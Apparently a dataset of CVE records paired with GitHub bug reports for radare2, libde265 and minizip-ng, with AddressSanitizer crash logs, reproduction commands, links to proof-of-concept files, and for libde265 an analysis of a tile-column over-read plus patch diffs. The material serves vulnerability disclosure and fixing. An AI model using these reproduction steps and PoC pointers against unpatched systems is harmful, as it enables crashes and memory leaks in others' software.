{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/65705be4f84269cb7cd725a1d4ab2ffa" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/radareorg/radare2/commit/40c9f50e127be80b9d816bce2ab2ee790831aefd" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch" ], "url": "https://github.com/radareorg/radare2/issues/22349" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/65705be4f84269cb7cd725a1d4ab2ffa" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/radareorg/radare2/commit/40c9f50e127be80b9d816bce2ab2ee790831aefd" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch" ], "url": "https://github.com/radareorg/radare2/issues/22349" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E042C08-7911-4974-A2A6-95F0EFD10809", "versionEndExcluding": "5.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/radareorg/radare2/issues/22349
[ "Exploit", "Patch" ]
github.com
[ "radareorg", "radare2" ]
# Version ``` $ r2 -v radare2 5.8.9 31339 @ linux-x86-64 birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28 commit: b2de2288d8299f89288c503fc2ce22381b61aba0 ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` WARN: mach0 header contains too many sections (268435492). Wrapping to 4 ERROR: parsing segment WARN: Cannot initialize items ================================================================= ==651889==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6160000086ef at pc 0x7fd883ae6cf1 bp 0x7ffcc29f8db0 sp 0x7ffcc29f8da8 READ of size 1 at 0x6160000086ef thread T0 #0 0x7fd883ae6cf0 in r_read_le32 /home/user/fuzzing_radare2/radare2/libr/include/r_endian.h:194:17 #1 0x7fd883ae6cf0 in r_read_at_le32 /home/user/fuzzing_radare2/radare2/libr/include/r_endian.h:203:9 #2 0x7fd883ae6cf0 in r_read_le64 /home/user/fuzzing_radare2/radare2/libr/include/r_endian.h:217:21 #3 0x7fd883ae6cf0 in r_ptr /home/user/fuzzing_radare2/radare2/libr/../libr/bin/p/bin_xnu_kernelcache.c:475:24 #4 0x7fd883ae6cf0 in process_constructors /home/user/fuzzing_radare2/radare2/libr/../libr/bin/p/bin_xnu_kernelcache.c:992:18 #5 0x7fd883adbe7e in entries /home/user/fuzzing_radare2/radare2/libr/../libr/bin/p/bin_xnu_kernelcache.c:852:2 #6 0x7fd8837bf7f4 in r_bin_object_set_items /home/user/fuzzing_radare2/radare2/libr/bin/bobj.c:317:17 #7 0x7fd8837bec70 in r_bin_object_new /home/user/fuzzing_radare2/radare2/libr/bin/bobj.c:182:2 #8 0x7fd8837b3a72 in r_bin_file_new_from_buffer /home/user/fuzzing_radare2/radare2/libr/bin/bfile.c:613:19 #9 0x7fd883787033 in r_bin_open_buf /home/user/fuzzing_radare2/radare2/libr/bin/bin.c:310:8 #10 0x7fd8837867c3 in r_bin_open_io /home/user/fuzzing_radare2/radare2/libr/bin/bin.c:376:13 #11 0x7fd8870d2107 in r_core_file_do_load_for_io_plugin /home/user/fuzzing_radare2/radare2/libr/core/cfile.c:445:7 #12 0x7fd8870d2107 in r_core_bin_load /home/user/fuzzing_radare2/radare2/libr/core/cfile.c:653:4 #13 0x7fd88827b2ff in binload /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:543:8 #14 0x7fd88827478a in r_main_radare2 /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:1475:10 #15 0x55a6d135c52d in main /home/user/fuzzing_radare2/radare2/binr/radare2/radare2.c:114:9 #16 0x7fd887829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #17 0x7fd887829e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #18 0x55a6d129e444 in _start (/home/user/fuzzing_radare2/radare2/binr/radare2/radare2+0x1f444) (BuildId: 655cd64f4959101bcf192e77bc6bf062577e0708) 0x6160000086ef is located 6 bytes to the right of 617-byte region [0x616000008480,0x6160000086e9) allocated by thread T0 here: #0 0x55a6d1321478 in __interceptor_calloc (/home/user/fuzzing_radare2/radare2/binr/radare2/radare2+0xa2478) (BuildId: 655cd64f4959101bcf192e77bc6bf062577e0708) #1 0x7fd883ae6389 in process_constructors /home/user/fuzzing_radare2/radare2/libr/../libr/bin/p/bin_xnu_kernelcache.c:981:14 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/user/fuzzing_radare2/radare2/libr/include/r_endian.h:194:17 in r_read_le32 Shadow bytes around the buggy address: 0x0c2c7fff9080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff90a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff90b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff90c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff90d0: 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa 0x0c2c7fff90e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff90f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==651889==ABORTING ``` # Reproduce ``` rabin2 -re poc or r2 -A -q poc ``` # POC File https://github.com/gandalf4a/crash_report/blob/main/radare2/rabin2/rabin_hbo_194 # Credit ``` Gandalf4a ```
heap-buffer-overflow at /radare2/libr/include/r_endian.h:194:17 in r_read_le32
https://api.github.com/repos/radareorg/radare2/issues/22349/comments
1
2023-10-27T11:53:55Z
2024-08-15T06:27:11Z
https://github.com/radareorg/radare2/issues/22349
1,965,363,992
22,349
5,766
CVE-2023-43887
2023-11-22T18:15:08.747
Libde265 v1.0.12 was discovered to contain multiple buffer overflows via the num_tile_columns and num_tile_row parameters in the function pic_parameter_set::dump.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/strukturag/libde265/commit/63b596c915977f038eafd7647d1db25488a8c133" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/strukturag/libde265/issues/418" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/strukturag/libde265/commit/63b596c915977f038eafd7647d1db25488a8c133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/strukturag/libde265/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "A736D1CB-9F33-4561-B10C-4074DF6C02F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/strukturag/libde265/issues/418
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "strukturag", "libde265" ]
## Summary There is a segmentation fault caused by a buffer over-read on pic_parameter_set::dump due to an incorrect value of num_tile_columns or num_tile_rows. ## Tested with: * Commit: 6fc550faeca2bbb1c82de5f29d970f6861146862 (master) * PoC: [poc](https://drive.google.com/file/d/1ISOxgjmw9mPCs-vIh84hsgEB2MfMcwHj/view?usp=drive_link) * cmd: `./dec265 -d poc` ## Crash output: ``` INFO: ----------------- SPS ----------------- INFO: video_parameter_set_id : 0 INFO: sps_max_sub_layers : 1 INFO: sps_temporal_id_nesting_flag : 1 INFO: general_profile_space : 0 INFO: general_tier_flag : 0 INFO: general_profile_idc : Main INFO: general_profile_compatibility_flags: 0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INFO: general_progressive_source_flag : 0 INFO: general_interlaced_source_flag : 0 INFO: general_non_packed_constraint_flag : 0 INFO: general_frame_only_constraint_flag : 0 INFO: general_level_idc : 60 (2.00) INFO: seq_parameter_set_id : 0 INFO: chroma_format_idc : 1 (4:2:0) INFO: pic_width_in_luma_samples : 416 INFO: pic_height_in_luma_samples : 240 INFO: conformance_window_flag : 1 INFO: conf_win_left_offset : 0 INFO: conf_win_right_offset : 0 INFO: conf_win_top_offset : 0 INFO: conf_win_bottom_offset: 0 INFO: bit_depth_luma : 10 INFO: bit_depth_chroma : 9 INFO: log2_max_pic_order_cnt_lsb : 4 INFO: sps_sub_layer_ordering_info_present_flag : 1 INFO: Layer 0 INFO: sps_max_dec_pic_buffering : 5 INFO: sps_max_num_reorder_pics : 3 INFO: sps_max_latency_increase_plus1 : 0 INFO: log2_min_luma_coding_block_size : 3 INFO: log2_diff_max_min_luma_coding_block_size : 1 INFO: log2_min_transform_block_size : 2 INFO: log2_diff_max_min_transform_block_size : 2 INFO: max_transform_hierarchy_depth_inter : 0 INFO: max_transform_hierarchy_depth_intra : 0 INFO: scaling_list_enable_flag : 0 INFO: amp_enabled_flag : 1 INFO: sample_adaptive_offset_enabled_flag : 1 INFO: pcm_enabled_flag : 0 INFO: num_short_term_ref_pic_sets : 11 INFO: ref_pic_set[ 0 ]: X...X.X.X.......|................ INFO: ref_pic_set[ 1 ]: ..........X.X...|...X............ INFO: ref_pic_set[ 2 ]: ............X.X.|.X...X.......... INFO: ref_pic_set[ 3 ]: ...............X|X.X...X......... INFO: ref_pic_set[ 4 ]: .............X.X|X...X........... INFO: ref_pic_set[ 5 ]: ..........X.X.X.|.X.............. INFO: ref_pic_set[ 6 ]: ...........X...X|X.X............. INFO: ref_pic_set[ 7 ]: .............X..|X.X.X........... INFO: ref_pic_set[ 8 ]: ........X.......|................ INFO: ref_pic_set[ 9 ]: ............X...|...X............ INFO: ref_pic_set[ 10 ]: ..............X.|.X...X.......... INFO: long_term_ref_pics_present_flag : 0 INFO: sps_temporal_mvp_enabled_flag : 1 INFO: strong_intra_smoothing_enable_flag : 1 INFO: vui_parameters_present_flag : 1 INFO: sps_extension_present_flag : 0 INFO: sps_range_extension_flag : 0 INFO: sps_multilayer_extension_flag : 0 INFO: sps_extension_6bits : 0 INFO: CtbSizeY : 16 INFO: MinCbSizeY : 8 INFO: MaxCbSizeY : 16 INFO: MinTBSizeY : 4 INFO: MaxTBSizeY : 16 INFO: PicWidthInCtbsY : 26 INFO: PicHeightInCtbsY : 15 INFO: SubWidthC : 2 INFO: SubHeightC : 2 INFO: ----------------- VUI ----------------- INFO: sample aspect ratio : 0:0 INFO: overscan_info_present_flag : 0 INFO: overscan_appropriate_flag : 0 INFO: video_signal_type_present_flag: 0 INFO: chroma_loc_info_present_flag: 0 INFO: neutral_chroma_indication_flag: 0 INFO: field_seq_flag : 0 INFO: frame_field_info_present_flag : 0 INFO: default_display_window_flag : 1 INFO: def_disp_win_left_offset : 0 INFO: def_disp_win_right_offset : 0 INFO: def_disp_win_top_offset : 0 INFO: def_disp_win_bottom_offset : 0 INFO: vui_timing_info_present_flag : 0 INFO: vui_poc_proportional_to_timing_flag : 0 INFO: vui_num_ticks_poc_diff_one : 1 INFO: vui_hrd_parameters_present_flag : 0 INFO: bitstream_restriction_flag : 0 INFO: ----------------- PPS ----------------- INFO: pic_parameter_set_id : 0 INFO: seq_parameter_set_id : 0 INFO: dependent_slice_segments_enabled_flag : 1 INFO: sign_data_hiding_flag : 1 INFO: cabac_init_present_flag : 0 INFO: num_ref_idx_l0_default_active : -84 INFO: num_ref_idx_l1_default_active : 12 INFO: pic_init_qp : 25 INFO: constrained_intra_pred_flag: 0 INFO: transform_skip_enabled_flag: 1 INFO: cu_qp_delta_enabled_flag : 0 INFO: pic_cb_qp_offset : 1 INFO: pic_cr_qp_offset : 0 INFO: pps_slice_chroma_qp_offsets_present_flag : 0 INFO: weighted_pred_flag : 0 INFO: weighted_bipred_flag : 1 INFO: output_flag_present_flag : 0 INFO: transquant_bypass_enable_flag: 0 INFO: tiles_enabled_flag : 1 INFO: entropy_coding_sync_enabled_flag: 0 INFO: num_tile_columns : 18815 INFO: num_tile_rows : 1 INFO: uniform_spacing_flag: 1 INFO: tile column boundaries: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3985 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 [1] 4017733 segmentation fault ./dec265 -d poc ``` ## Analysis While executing `decoder_context::read_pps_NAL`, parameters are read in ```c++ bool success = new_pps->read(&reader,this); ``` Inside the function, there is a check when setting `num_tile_columns` in case it goes over `DE265_MAX_TILE_COLUMNS`, which is 10. ```c++ if (tiles_enabled_flag) { num_tile_columns = get_uvlc(br); if (num_tile_columns == UVLC_ERROR || num_tile_columns+1 > DE265_MAX_TILE_COLUMNS) { ctx->add_warning(DE265_WARNING_PPS_HEADER_INVALID, false); return false; } ``` After exiting due to reading more than `DE265_MAX_TILE_COLUMNS`, the headers are dumped by calling `dump`: ```c++ bool success = new_pps->read(&reader,this); if (param_pps_headers_fd>=0) { new_pps->dump(param_pps_headers_fd); } if (success) { pps[ (int)new_pps->pic_parameter_set_id ] = new_pps; } ``` In `dump`, the following code is executed to dump the tile column boundaries: ```c++ LOG0("tile column boundaries: "); for (int i=0;i<=num_tile_columns;i++) { LOG1("*%d ",colBd[i]); } LOG0("*\n"); ``` As previously shown, `num_tile_columns` while be set to a higher number than `DE265_MAX_TILE_COLUMNS`. `colBd` is defined as: `int colBd [ DE265_MAX_TILE_COLUMNS+1 ];` Therefore, that loop will go over `colBd` and will print all the data pointed by the values found after the limits of `colBd` in memory until the end of the loop or the next memory address is invalid. ## Impact * Information leak from memory * Crash If using a carefully crafted exploit, the impact could be an information leak without a crash. ## Patch In order to prevent this, the `success` value should be checked before printing the information: ```diff diff --git a/libde265/decctx.cc b/libde265/decctx.cc index 223a6aaf..1b79adec 100644 --- a/libde265/decctx.cc +++ b/libde265/decctx.cc @@ -583,11 +583,10 @@ de265_error decoder_context::read_pps_NAL(bitreader& reader) bool success = new_pps->read(&reader,this); - if (param_pps_headers_fd>=0) { - new_pps->dump(param_pps_headers_fd); - } - if (success) { + if (param_pps_headers_fd>=0) { + new_pps->dump(param_pps_headers_fd); + } pps[ (int)new_pps->pic_parameter_set_id ] = new_pps; } ``` Another possibility could be to perform length checks inside the `dump` function to handle the case: ```diff diff --git a/libde265/pps.cc b/libde265/pps.cc index de3bcda1..a5abd9b3 100644 --- a/libde265/pps.cc +++ b/libde265/pps.cc @@ -903,14 +903,22 @@ void pic_parameter_set::dump(int fd) const LOG1("uniform_spacing_flag: %d\n", uniform_spacing_flag); LOG0("tile column boundaries: "); - for (int i=0;i<=num_tile_columns;i++) { - LOG1("*%d ",colBd[i]); + if (num_tile_columns+1 > DE265_MAX_TILE_COLUMNS) { + LOG0("Number of tile columns is invalid"); + } else { + for (int i=0;i<=num_tile_columns;i++) { + LOG1("*%d ",colBd[i]); + } } LOG0("*\n"); LOG0("tile row boundaries: "); - for (int i=0;i<=num_tile_rows;i++) { - LOG1("*%d ",rowBd[i]); + if (num_tile_rows+1 > DE265_MAX_TILE_ROWS) { + LOG0("Number of tile rows is invalid"); + } else { + for (int i=0;i<=num_tile_rows;i++) { + LOG1("*%d ",rowBd[i]); + } } LOG0("*\n"); ``` ## Other notes The same issue occurs with `num_tile_rows`.
Buffer over-read causes segmentation fault in pic_parameter_set::dump
https://api.github.com/repos/strukturag/libde265/issues/418/comments
7
2023-08-30T14:08:02Z
2024-09-05T13:23:53Z
https://github.com/strukturag/libde265/issues/418
1,873,762,647
418
5,767
CVE-2023-48106
2023-11-22T18:15:09.630
Buffer Overflow vulnerability in zlib-ng minizip-ng v.4.0.2 allows an attacker to execute arbitrary code via a crafted file to the mz_path_resolve function in the mz_os.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/zlib-ng/minizip-ng/issues/740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/zlib-ng/minizip-ng/issues/740" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zlib-ng:minizip-ng:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "D65B2CB9-EB98-4AA7-AEC5-FE76A1022E72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/zlib-ng/minizip-ng/issues/740
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "zlib-ng", "minizip-ng" ]
#### Description heap-buffer-overflow (/minizip-ng/build/minizip+0x976d) in mz_path_resolve #### Version ```bash $ ./minizip -h minizip-ng 4.0.2 - https://github.com/zlib-ng/minizip-ng --------------------------------------------------- -h Usage: minizip [-x][-d dir|-l|-e][-o][-f][-y][-c cp][-a][-0 to -9][-b|-m|-t][-k 512][-p pwd][-s] file.zip [files] -x Extract files -l List files -d Destination directory -e Erase files -o Overwrite existing files -c File names use cp437 encoding (or specified codepage) -a Append to existing zip file -i Include full path of files -f Follow symbolic links -y Store symbolic links -v Verbose info -0 Store only -1 Compress faster -9 Compress better -k Disk size in KB -z Zip central directory -p Encryption password -s AES encryption -b BZIP2 compression -m LZMA compression -n XZ compression -t ZSTD compression ``` #### Replay ```bash git clone https://github.com/zlib-ng/minizip-ng.git cd minizip-ng/ CC="gcc -fsanitize=address" CXX="g++ -fsanitize=address" cmake -S . -B build -D MZ_BUILD_TESTS=ON cmake --build build ./minizip -x -o poc1 ``` #### ASAN ```bash -x -o /root/poc/minizip/poc1 Archive /root/poc/minizip/poc1 ================================================================= ==3028155==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d0000001df at pc 0x55555555d76e bp 0x7fffffffddf0 sp 0x7fffffffdde0 READ of size 1 at 0x60d0000001df thread T0 #0 0x55555555d76d in mz_path_resolve (/root/test/minizip-ng/build/minizip+0x976d) #1 0x555555573c77 in mz_zip_reader_save_all (/root/test/minizip-ng/build/minizip+0x1fc77) #2 0x55555555af70 in minizip_extract (/root/test/minizip-ng/build/minizip+0x6f70) #3 0x55555555c7ec in main (/root/test/minizip-ng/build/minizip+0x87ec) #4 0x7ffff73a9082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #5 0x555555558aed in _start (/root/test/minizip-ng/build/minizip+0x4aed) 0x60d0000001df is located 1 bytes to the left of 129-byte region [0x60d0000001e0,0x60d000000261) allocated by thread T0 here: #0 0x7ffff76a0808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x55555557391b in mz_zip_reader_save_all (/root/test/minizip-ng/build/minizip+0x1f91b) #2 0x55555555af70 in minizip_extract (/root/test/minizip-ng/build/minizip+0x6f70) #3 0x55555555c7ec in main (/root/test/minizip-ng/build/minizip+0x87ec) #4 0x7ffff73a9082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/test/minizip-ng/build/minizip+0x976d) in mz_path_resolve Shadow bytes around the buggy address: 0x0c1a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1a7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1a7fff8010: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa 0x0c1a7fff8020: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1a7fff8030: 00 00 01 fa fa fa fa fa fa fa fa[fa]00 00 00 00 0x0c1a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 01 fa fa fa 0x0c1a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3028155==ABORTING ``` #### POC https://github.com/Akane0721/POC/blob/f37d805631e0a15bea1f15b6e1edfb3246a2e0fc/minizip-ng/poc1 #### Environment ``` Ubuntu 20.04 Clang 10.0.0 gcc 9.4.0 ```
Heap-buffer-overflow in mz_os.c:188 in mz_path_resolve
https://api.github.com/repos/zlib-ng/minizip-ng/issues/740/comments
5
2023-11-08T12:26:58Z
2023-11-13T18:05:46Z
https://github.com/zlib-ng/minizip-ng/issues/740
1,983,488,868
740
5,768
CVE-2023-48105
2023-11-22T23:15:10.617
An heap overflow vulnerability was discovered in Bytecode alliance wasm-micro-runtime v.1.2.3 allows a remote attacker to cause a denial of service via the wasm_loader_prepare_bytecode function in core/iwasm/interpreter/wasm_loader.c.
